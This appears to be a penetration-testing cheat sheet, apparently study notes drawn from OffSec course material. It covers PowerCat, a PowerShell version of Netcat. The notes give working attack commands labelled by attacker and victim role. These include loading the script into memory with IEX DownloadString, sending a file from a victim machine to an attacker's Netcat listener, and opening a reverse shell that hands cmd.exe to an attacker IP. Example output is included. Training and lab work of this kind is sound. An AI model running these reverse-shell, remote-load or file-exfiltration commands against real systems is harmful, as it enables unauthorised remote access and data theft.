🐈PowerCat

PowerShell version of Netcat written by besimorhino

Installation

PowerShell

Load The Function From Downloaded .ps1

. .\powercat.ps1

Load The Function From URL (PS)

IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')

Note:

• It is worth noting that scripts loaded in this way will only be available in the current PowerShell instance and will need to be reloaded each time we restart PowerShell.

Kali

Installation (Kali)

apt install powercat

• Path: /usr/share/windows-resources/powercat

File Transfer

Netcat Listener (attacker)

Code

sudo nc -lnvp <port> > receiving_powercat.ps1

Example

kali@kali:~$ sudo nc -lnvp 443 > receiving_powercat.ps1
listening on [any] 443 ...
connect to [10.11.0.4] from (UNKNOWN) [10.11.0.22] 63661

Powercat (victim)

Code

 powercat -c <attacker_ip> -p <port> -i C:\<path>\powercat.ps1

Example

PS C:\Users\Offsec> powercat -c 10.11.0.4 -p 443 -i C:\Users\Offsec\powercat.ps1

• -c: specifies client mode and sets the listening IP address

• -p: specifies the port number

• -i: indicates the local file that will be transferred remotely

Reverse Shell

Netcat Listener (attacker)

Code

sudo nc -lnvp <port>

Example

kali@kali:~$ sudo nc -lvp 443
listening on [any] 443 ...

Powercat (victim)

Code

powercat -c <attacker_ip> -p <port> -e <application>

Example

PS C:\Users\offsec> powercat -c 10.11.0.4 -p 443 -e cmd.exe

• -c: specifies client mode and sets the listening IP address

• -e: specifies the application to execute

Powercat Bind Shells

To read more about it.

Note:

• PDF page 93

Powercat Stand-Alone Payloads

To read more about it.

Note:

• PDF page 93